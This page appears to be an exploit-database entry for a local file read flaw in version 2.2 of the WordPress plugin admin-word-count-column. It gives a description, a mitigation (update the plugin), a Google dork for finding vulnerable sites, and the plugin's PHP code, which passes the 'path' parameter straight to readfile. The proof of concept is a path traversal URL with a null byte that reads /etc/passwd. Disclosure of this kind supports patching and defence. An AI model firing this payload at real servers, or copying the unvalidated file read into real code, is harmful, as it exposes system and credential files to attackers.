header-logo
Suggest Exploit
vendor:
admin-word-count-column
by:
Hassan Khan Yusufzai - Splint3r7
8.8
CVSS
HIGH
Local File Read
22
CWE
Product Name: admin-word-count-column
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: PHP 5.3.2 or below
2022

WordPress Plugin admin-word-count-column 2.2 – Local File Read

An attacker can exploit a Local File Read vulnerability in WordPress Plugin admin-word-count-column version 2.2. The vulnerability exists due to the lack of proper validation of user-supplied input in the 'path' parameter of the 'download-csv.php' script. A remote attacker can send a specially crafted request to the vulnerable script and read arbitrary files from the server. The attacker can also inject a null byte to bypass the file extension check and read any file from the server.

Mitigation:

Update to the latest version of the WordPress Plugin admin-word-count-column.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Read
# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/
# Date: 27-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/
# Version: 2.2
# Contact me: h [at] spidersilk.com

# PHP version: 5.3.2 or below

# Vulnerable File: plugins/admin-word-count-column/download-csv.php

# Vulnerable Code:

```
<?php
date_default_timezone_set('America/Los_Angeles');
$csvdate = date('Md-H-i-s-T');
$csvname = 'wordcounts-' . $csvdate . '.csv';
header('Content-Type: application/csv');
header('Content-Disposition: attachment; filename=' . $csvname);
header('Pragma: no-cache');
readfile($_GET['path'] . 'cpwc.csv');
?>
```

# Proof of Concept:

localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0

Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.

Navigation

Suggest Exploit

Services By CQR